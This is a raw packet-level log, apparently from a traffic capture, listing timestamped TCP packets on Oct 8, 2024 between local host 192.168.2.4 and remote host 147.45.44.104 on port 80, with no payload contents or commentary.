                                                  Oct 8, 2024 03:30:55.573997021 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574006081 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574023008 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574034929 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574040890 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574062109 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574069977 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574081898 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574098110 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574105978 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574114084 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574131966 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574141026 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574172020 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574187040 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574194908 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574203968 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574209929 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574254990 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574304104 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574397087 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574413061 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574429989 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574436903 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574446917 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574453115 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574470997 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574470997 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574489117 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574500084 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574505091 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574526072 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574536085 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574554920 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574570894 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574573040 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574590921 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574599028 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574614048 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574636936 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574644089 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574657917 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574661970 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574680090 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574687004 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574696064 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574712992 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574723005 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574729919 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574748039 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574759960 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574788094 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574791908 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574805021 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574851036 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.574959040 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574975014 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.574990034 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.575006008 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.575020075 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.575022936 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.575041056 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.575045109 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.575057030 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.575074911 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.575088024 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.575120926 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.575726032 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.662360907 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.662420034 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.662436962 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.662452936 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.662471056 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.662488937 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.662508011 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.662507057 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.662507057 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.662579060 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663041115 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663058043 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663073063 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663100004 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663105965 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663105965 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663116932 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663132906 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663147926 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663167953 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663172007 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663186073 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663188934 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663314104 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663331032 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663346052 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663347960 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663366079 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663372040 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663393021 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663408041 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663439989 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663456917 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663471937 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663487911 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663489103 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663513899 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663533926 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663548946 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663575888 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663575888 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.663593054 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.663609982 CEST8049730147.45.44.104192.168.2.4
Oct 8, 2024 03:30:55.663619041 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.663626909 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.663644075 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.663657904 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.663671970 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.663691044 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.663692951 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.663707018 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.663716078 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.663731098 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.663744926 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.663759947 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.663768053 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.663777113 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.663793087 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.663808107 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.663819075 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.663825989 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.663841963 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.663844109 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.663861036 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.663862944 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.663892031 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.663906097 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.663911104 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.663929939 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.663945913 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.663953066 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.663963079 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.663980007 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.663981915 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.663996935 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664015055 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664020061 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.664032936 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664057016 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.664072037 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664089918 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664108992 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664110899 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.664125919 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664143085 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664145947 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.664160967 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664177895 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664180040 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.664283037 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664299965 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664314985 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.664314985 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664335012 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664336920 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.664351940 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664370060 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664372921 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.664386988 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664406061 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664407015 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.664422989 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664446115 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.664467096 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664480925 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664495945 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664508104 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.664513111 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664530039 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664535046 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.664563894 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.664608002 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664623976 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664639950 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664657116 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664664030 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.664674997 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664690971 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.664691925 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664727926 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.664747953 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664764881 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664782047 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664798021 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664803982 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.664815903 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664832115 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.664906979 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664922953 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664938927 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664954901 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664957047 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.664966106 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664973021 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664982080 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.664999008 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665045977 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.665065050 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665067911 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.665081978 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665107012 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.665108919 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665126085 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665133953 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665143013 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665150881 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665164948 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665222883 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.665266991 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665283918 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665298939 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665313959 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.665335894 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.665357113 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665374041 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665388107 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665405989 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665410042 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.665422916 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665441036 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665445089 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.665457964 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665474892 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665482044 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.665496111 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665515900 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.665612936 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665631056 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665647030 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665653944 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.665664911 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665682077 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665683985 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.665699959 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665719032 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.665725946 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.665751934 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.666028976 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.753134966 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.753226995 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.753243923 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.753259897 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.753277063 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.753294945 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.753312111 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.753354073 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.753354073 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.753354073 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.753526926 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.753557920 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.753571033 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.753575087 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.753612041 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.753623009 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.753628969 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.753647089 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.753664970 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.753665924 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.753684044 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.753706932 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.753751040 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.753767014 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.753783941 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.753797054 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.753803015 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.753825903 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.753927946 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.753971100 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.753971100 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.753990889 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754005909 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754023075 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754030943 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.754064083 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.754105091 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754121065 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754151106 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754159927 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.754168034 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754184008 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754201889 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754208088 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.754225969 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754240036 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.754244089 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754261971 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754285097 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.754288912 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754326105 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754336119 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.754343987 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754362106 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754383087 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754383087 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.754412889 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754422903 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.754431009 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754457951 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754466057 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.754476070 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754492044 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754508018 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754513979 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.754527092 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754543066 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754547119 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.754579067 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.754602909 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754620075 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754635096 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754652977 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754654884 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.754668951 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754693031 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.754734993 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754751921 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754767895 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754775047 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.754786968 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754802942 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.754803896 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754842043 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.754863977 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754892111 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754909992 CEST  80     49730  147.45.44.104  192.168.2.4
